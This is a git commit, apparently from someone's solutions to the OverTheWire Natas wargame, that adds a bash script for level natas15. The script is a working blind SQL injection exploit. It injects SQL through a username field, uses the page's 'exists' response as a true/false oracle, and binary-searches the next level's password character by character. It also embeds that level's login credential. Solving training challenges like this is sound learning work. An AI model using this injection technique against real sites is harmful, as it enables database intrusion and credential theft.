OverTheWire

2025-07-15 22:44:06 +10:00 · 2025-07-15 22:44:06 +10:00 · 500329a86b
commit 500329a86b
17 changed files with 889 additions and 0 deletions
--- a/overthewire/natas/scripts/natas15.sh
+++ b/overthewire/natas/scripts/natas15.sh
@ -0,0 +1,90 @@
+#!/usr/bin/env bash
+
+req() {
+  curl http://natas15.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \
+       -d "username=natas16\" and $1 -- " \
+       -sS \
+    | grep exists &>/dev/null
+}
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  req "length(password)$1"
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s - %-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"